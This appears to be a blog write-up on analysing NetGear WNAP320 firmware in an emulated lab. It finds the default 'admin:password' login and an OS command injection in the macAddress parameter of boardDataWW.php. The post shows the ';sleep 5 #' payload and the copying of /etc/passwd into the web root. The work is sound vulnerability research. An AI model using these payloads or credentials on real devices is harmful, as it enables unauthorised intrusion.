Firmware Analysis on NetGear Access Point WNAP 320
We can see that there’s a lot of IoT devices that is connected to the internet today. But most of the user did not notice that their IoT devices might have some vulnerable security issues.
Most of the vendor will release patches to fix the security vulnerability of the IoT devices. But most of the user doesn’t upgrade their IoT device firmware which might cause their IoT device expose to some known security issues.
Today, we will be doing some firmware analysis on NetGear Access Point WNAP 320 Firmware Version 2.0.3.
Download The Firmware From Official Website
To analyze the firmware of the Netgear Access Point, we can straight away went to their official website to download the firmware zip file.
Find the firmware v2.0.3 and download it.
Unzip the firmware zip file and we can see that there is 2 files in the archive.
The tar archive file is more interesting to us, in the tar archive file, we found the rootfs.squashfs, this will be the file that store the access point file system.
Analyzing the File System Binary
We will start using binwalk to analyze the rootfs.squashfs. Over here we can extract some information of the file. Here it show us that it is a Squashfs filesystem.
Now let’s try to extract the filesystem out from the rootfs.squashfs.
But there’s some problem when we tried to extract it, it shows that sasquatch was not installed. So we need to install it to proceed to the next step.
Over here we can check out the binwalk GitHub page that there’s some guidance on how we can install sasquatch to our system.
After installing it now we’re good to go. We have successfully extracted the filesystem!
Further Analysis on Squashfs-root Directory
Now let’s check out the squashfs-root directory, when we cd into the directory, we notice that the layout seems like Linux filesystem.
We continue enumerate the filesystem, we found the web pages of the Netgear access point stored in home/www directory.
Now let’s check out each of the .php files to find any vulnerability that we can exploit this Netgear access point.
Code Review on login.php
First, we found that the default username will be ‘admin’ based on this line of code.
Then, we notice that the password get from requests ‘password’ will be compared with $str and in the comment part it specified ‘password’ so we assume that’s the default credential.
the default credential that we got from the analysis will be ‘admin:password’.
Code Review on boardDataWW.php
Now, we check out another interesting .php file. If you notice that line 8 of the code it used exec() to execute system commands.
The line of code will get the value from request parameters of ‘macAddress’ & ‘reginfo’ & the best part is that it doesn’t check for any input that the users entered. This is bad, the developer should notice this mistake as user inputs must not be trust!
Based on our experience, the attacker can perform os command injection by appending the payload ‘<macaddress>; <system command> #’ into the macAddress parameter to execute another system command.
Building Environment to Test The Vulnerability
We don’t really need the Netgear access point device in order to test the vulnerability. We can use firmware analysis toolkit to build the environment for us to do the testing.
First, we need to change the ownership of rootfs.squashfs to root & elevate our privilege to root.
Then we build up the environment of NetGear Access Point WNAP320 with firmware analysis toolkit.
Over here we can find that the Netgear access point network interface running in this IP address ‘192.168.0.100’.
Let’s check out the main page of Netgear access point & voila we’ve successfully build our virtual Netgear access point.
Time for exploit!
Now it’s time for us to test our findings above. First let’s try out the default credential ‘admin:password’ that we found in login.php and it seems like our finding was correct that’s the default credential for it!
Now let’s check out the boardDataWW.php, above there we found that this php page was vulnerable to OS command injection in the macAddress parameter right, so let’s try it out.
We use burpsuite to intercept the request packet.
Now let’s forward the request packet to burpsuite responder, and test out normal execution. From the result, we can find that it used 191ms to successfully perform the execution.
Now let’s try out injecting the system command that will make the system sleep for 5 seconds.
Payload Injected: ;sleep 5 #(comment behind commands)
Here the time taken for the execution are 8,291ms which means that there’s delay on the Netgear access point & we managed to inject our system commands behind there!
Now let’s try to copy the /etc/passwd to the current directory and name it herepasswd.html.
Voila! We managed to retrieved the /etc/passwd contents.
I’ve written an PoC script which abuse the vulnerability, you can check it out in my GitHub repo. Click me to redirect to my Netgear WNAP320 PoC repository.
Time for CleanUp
After we’ve done testing on the Netgear access point firmware, it’s time for cleanup.
Just type ‘ctrl-a + x’ to exit the qemu.
Then remove the images extracted & created files with reset.py.